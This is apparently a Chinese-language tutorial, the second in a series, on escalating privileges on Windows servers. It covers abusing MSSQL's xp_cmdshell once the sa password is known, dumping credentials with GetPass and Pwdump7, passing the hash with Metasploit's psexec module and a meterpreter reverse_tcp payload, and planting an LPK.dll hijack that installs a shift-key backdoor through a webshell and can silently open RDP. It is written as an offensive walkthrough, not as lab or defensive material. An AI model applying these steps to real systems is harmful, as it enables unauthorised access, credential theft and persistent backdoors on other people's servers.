提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權

標籤：cmdshell   options   download   按鍵組合   利用   管理員   資料   後門   漏洞   

(一)、Mssql提權

 

必要條件：擷取到mssql資料庫最高許可權使用者sa的帳號密碼

 

Mssql預設連接埠：1433

Mssql最高許可權使用者：sa

 

 

 

得到sa密碼之後，通過工具直接連接上去。

 

 

MSSQL內建了一個XP_CMDSHELL用來執行CMD命令。

 

(二)、GetPass 提權

 

 

一款擷取電腦使用者帳號密碼的工具

 

 

(三)、hash傳遞入侵 msf載入

 

 

Hash 演算法：windows密碼的加密方式

Msf下載：http://www.rapid7.com/products/metasploit/download.jsp

 

以下使用Kali示範

 

 

Msf使用：

 

msfconsole   //啟動終端

 

 

use exploit/windows/smb/psexec //用到模組

show options //查看模組選項屬性

 

 

set PAYLOAD windows/meterpreter/reverse_tcp   //設定漏洞利用載體

Show targets //查看模組的攻擊目標屬性

 

 

set LHOST //設定本機地址
set RHOST 192.168.0.254 //設定屬性目標主機地址
set SMBUser administrators //設定屬性使用者

 

set SMBPass  xxx  //設定屬性密文hash

 

目標主機的hash怎麼擷取了?可以通過Pwdump7這個工具來擷取hash值

 

 

複製以下一段就行了

 

 

 

exploit  //開始攻擊

 

擷取當前shell,執行命令

 

 

(四)、lpk提權

觸發：目錄下存在exe檔案被執行，他的特點是每個可執行檔運行之前都要載入該檔案，windows系統是先判斷當前檔案目錄是否存在此檔案，如果目錄下存在該檔案則執行,如果不存在則會執行system32目錄下的dll。

啟動方案：3389遠端桌面連線啟動（連續shift，然後按熱鍵）

提權方案：產生lpk.dll，通過webshell上傳至檔案目錄，等待管理員去觸發exe程式。

 

運行LPK Setch這個工具選擇，2鍵啟動，此時的2鍵3索引值為LPK Sethc內建固定的數字，比如65,66就對應a與b。

 

 

然後點擊產生，將產生的lpk.dll上傳至任意目錄,並運行其中的任何一個exe檔案,lpk.dll將會自動替換為shift後門。

我這裡把它產生到了軟體的目錄，然後點擊運行軟體

 

 

然後遠端連線，連續按五次shift鍵，會出現下面的提示

 

 

接著同步選取按鍵組合(也就是在哪裡設定的65,66,對應的A,B)，就會出現下面的密碼框

 

 

輸入密碼，就會進入下面的介面!!!

 

 

還可以用來執行軟體，比如用來開3389，在產生lpk.dll是選中

 

 

產生lpk.dll然後放到任意目錄下，未執行軟體之前遠程是關閉的

 

 

然後執行exe軟體，你好發現遠程被開啟了。

 

 

提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權